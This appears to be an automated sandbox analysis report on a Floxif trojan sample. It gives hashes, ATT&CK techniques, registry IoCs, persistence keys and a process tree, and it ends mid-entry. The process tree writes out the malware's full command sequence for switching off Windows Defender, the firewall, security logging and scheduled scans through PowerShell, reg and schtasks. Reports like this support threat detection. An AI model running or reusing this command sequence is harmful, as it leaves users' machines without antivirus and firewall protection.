floxif | 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2025 19:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Size

313KB
MD5

3e23d56e5ced25d69b67735acb9ec044
SHA1

68b4163fade128741c2954579c5b2bc5ca17b6c2
SHA256

09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba
SHA512

4570b509f66b67c1b1b234d66415456435040c2b6992aa8c0359c47ac984f245be72007f5739f56c0c11beabe69f3a6091821869f4fbf7da372216653d77fb2b
SSDEEP

6144:UsLqdufVUNDaPxdk1cWQRNTBSNBV+UdvrEFp7hKjKp1:PFUNDaPQv0NT0NBjvrEH7+8

Score

10^/10

floxif backdoor defense_evasion discovery evasion execution persistence privilege_escalation trojan upx

Malware Config

Signatures

Floxif family
floxif
Floxif, Floodfix
Floxif aka FloodFix is a file-changing trojan and backdoor written in C++.
backdoor trojan floxif

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Detects Floxif payload 1 IoCs

backdoor

resource	yara_rule
behavioral2/files/0x000a000000023b77-11.dat	floxif

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2416	netsh.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000a000000023b77-11.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe

Executes dropped EXE 6 IoCs

pid	Process
1352	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
4784	icsys.icn.exe
228	explorer.exe
1040	spoolsv.exe
3568	svchost.exe
2432	spoolsv.exe

Loads dropped DLL 1 IoCs

pid	Process
1352	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4680	powershell.exe
460	powershell.exe
392	powershell.exe
3308	powershell.exe
4368	powershell.exe
1184	powershell.exe
2500	powershell.exe
3984	powershell.exe
2796	powershell.exe
4156	powershell.exe
4000	powershell.exe
5032	powershell.exe
4384	powershell.exe
5080	powershell.exe
4860	powershell.exe
1144	powershell.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\e:	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\explorer.exe	svchost.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b77-11.dat	upx
behavioral2/memory/1352-14-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral2/memory/1352-176-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral2/memory/1352-248-0x0000000010000000-0x0000000010030000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\System\symsrv.dll	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
File created	\??\c:\program files\common files\system\symsrv.dll.000	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Resources\tjud.exe	explorer.exe
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
File opened for modification	\??\c:\windows\resources\themes\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\resources\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\svchost.exe	spoolsv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icsys.icn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
4784	icsys.icn.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
228	explorer.exe
3568	svchost.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	1352	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	460	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
4784	icsys.icn.exe
4784	icsys.icn.exe
228	explorer.exe
228	explorer.exe
1040	spoolsv.exe
1040	spoolsv.exe
3568	svchost.exe
3568	svchost.exe
2432	spoolsv.exe
2432	spoolsv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3268 wrote to memory of 1352	3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	83
PID 3268 wrote to memory of 1352	3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	83
PID 3268 wrote to memory of 1352	3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	83
PID 3268 wrote to memory of 4784	3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	84
PID 3268 wrote to memory of 4784	3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	84
PID 3268 wrote to memory of 4784	3268	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	84
PID 4784 wrote to memory of 228	4784	icsys.icn.exe	85
PID 4784 wrote to memory of 228	4784	icsys.icn.exe	85
PID 4784 wrote to memory of 228	4784	icsys.icn.exe	85
PID 1352 wrote to memory of 644	1352	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	86
PID 1352 wrote to memory of 644	1352	09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe	86
PID 228 wrote to memory of 1040	228	explorer.exe	88
PID 228 wrote to memory of 1040	228	explorer.exe	88
PID 228 wrote to memory of 1040	228	explorer.exe	88
PID 1040 wrote to memory of 3568	1040	spoolsv.exe	90
PID 1040 wrote to memory of 3568	1040	spoolsv.exe	90
PID 1040 wrote to memory of 3568	1040	spoolsv.exe	90
PID 644 wrote to memory of 5080	644	cmd.exe	91
PID 644 wrote to memory of 5080	644	cmd.exe	91
PID 3568 wrote to memory of 2432	3568	svchost.exe	92
PID 3568 wrote to memory of 2432	3568	svchost.exe	92
PID 3568 wrote to memory of 2432	3568	svchost.exe	92
PID 644 wrote to memory of 2796	644	cmd.exe	93
PID 644 wrote to memory of 2796	644	cmd.exe	93
PID 644 wrote to memory of 392	644	cmd.exe	94
PID 644 wrote to memory of 392	644	cmd.exe	94
PID 644 wrote to memory of 4860	644	cmd.exe	95
PID 644 wrote to memory of 4860	644	cmd.exe	95
PID 644 wrote to memory of 1184	644	cmd.exe	96
PID 644 wrote to memory of 1184	644	cmd.exe	96
PID 644 wrote to memory of 1144	644	cmd.exe	97
PID 644 wrote to memory of 1144	644	cmd.exe	97
PID 644 wrote to memory of 4156	644	cmd.exe	98
PID 644 wrote to memory of 4156	644	cmd.exe	98
PID 644 wrote to memory of 3308	644	cmd.exe	99
PID 644 wrote to memory of 3308	644	cmd.exe	99
PID 644 wrote to memory of 4000	644	cmd.exe	100
PID 644 wrote to memory of 4000	644	cmd.exe	100
PID 644 wrote to memory of 4368	644	cmd.exe	101
PID 644 wrote to memory of 4368	644	cmd.exe	101
PID 644 wrote to memory of 3984	644	cmd.exe	102
PID 644 wrote to memory of 3984	644	cmd.exe	102
PID 644 wrote to memory of 5032	644	cmd.exe	103
PID 644 wrote to memory of 5032	644	cmd.exe	103
PID 644 wrote to memory of 4384	644	cmd.exe	104
PID 644 wrote to memory of 4384	644	cmd.exe	104
PID 644 wrote to memory of 2500	644	cmd.exe	105
PID 644 wrote to memory of 2500	644	cmd.exe	105
PID 644 wrote to memory of 4680	644	cmd.exe	106
PID 644 wrote to memory of 4680	644	cmd.exe	106
PID 644 wrote to memory of 460	644	cmd.exe	107
PID 644 wrote to memory of 460	644	cmd.exe	107
PID 460 wrote to memory of 2416	460	powershell.exe	108
PID 460 wrote to memory of 2416	460	powershell.exe	108
PID 644 wrote to memory of 1968	644	cmd.exe	109
PID 644 wrote to memory of 1968	644	cmd.exe	109
PID 644 wrote to memory of 3260	644	cmd.exe	110
PID 644 wrote to memory of 3260	644	cmd.exe	110
PID 644 wrote to memory of 1648	644	cmd.exe	111
PID 644 wrote to memory of 1648	644	cmd.exe	111
PID 644 wrote to memory of 3220	644	cmd.exe	112
PID 644 wrote to memory of 3220	644	cmd.exe	112
PID 644 wrote to memory of 2508	644	cmd.exe	113
PID 644 wrote to memory of 2508	644	cmd.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
"C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3268
- \??\c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
  c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FCF.tmp\7FD0.tmp\7FD1.bat c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -MAPSReporting 0"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "netsh advfirewall set allprofiles state off"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:460
    - - C:\Windows\system32\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2416
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1968
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:3260
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:1648
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:3220
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2508
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1156
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:4140
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1888
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:4496
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:2612
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:3928
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:436
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:1892
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:4356
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:1384
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:4064
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:4224
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:4168
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:4620
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:1784
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:4340
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:5044
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:4032
  - - C:\Windows\system32\reg.exe
